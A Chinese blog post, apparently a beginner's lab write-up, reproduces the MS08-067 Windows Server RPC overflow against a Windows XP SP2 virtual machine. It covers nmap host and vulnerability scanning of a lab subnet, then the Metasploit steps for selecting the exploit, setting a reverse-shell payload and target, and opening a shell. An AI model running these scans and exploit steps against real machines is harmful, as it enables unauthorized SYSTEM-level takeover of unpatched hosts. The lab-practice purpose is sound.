admin管理员组

文章数量:1566222

文章目录

  • 一、漏洞详情
  • 二、靶机搭建
    • kali
    • Windows XP SP2 (Simplified Chinese )
  • 三、利用nmap对靶机扫描
  • 四、漏洞利用
  • 五、总结

一、漏洞详情

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。

二、靶机搭建

kali

Windows XP SP2 (Simplified Chinese )

下载平台:

https://next.itellyou/Original/

下载链接:

ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/

(1)、配置IP:

(2)、关闭防火墙:

三、利用nmap对靶机扫描

(1)、利用nmap探测主机存活:

注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101

nmap -sP -T4 172.16.12.0/24

(2)、利用nmap自带脚本对目标IP扫描:

nmap -sT -A --script=vuln -P0 172.16.12.101

注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,且目标靶机445端口开放,但是我们现在只考虑ms08-067。

四、漏洞利用

(1)、搜索 MS08_067漏洞:

search ms08

(2)、选择MS08_067漏洞:

use  0

(3)、查看MS08_067漏洞的payloads:

show payloads

(4)、选择42号payload:

set  payload 42

(5)、查看MS08_067漏洞所适用的Windows版本:

show targets

(6)、设置对应的目标靶机Windows版本:

set target  10

(7)、查看payload的详细信息:

show options

(8)、配置靶机ip,靶机开放端口,反向连接地址为攻击机ip,设置攻击机监听tcp端口号:
注:通过nmap得知靶机开放端口为445,所以默认设置。反向连接地址为攻击机ip,攻击机监听tcp端口号默认设置

set rhosts  172.16.12.101

(9)、初始化攻击环境,并开始对目标靶机进行攻击:

exploit 

(10)、进入目标系统的互交命令行shll中:

shell

(1)、用ipconfig验证:

ipconfig

五、总结

写到这里,这篇文章就介绍结束了,通过本次实验我们复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及深入理解.
这也是我初入渗透测试的第一次漏洞复现,以后再接再厉,祝大家学而不缀!

本文标签: 漏洞XPWindowsChineseSimplified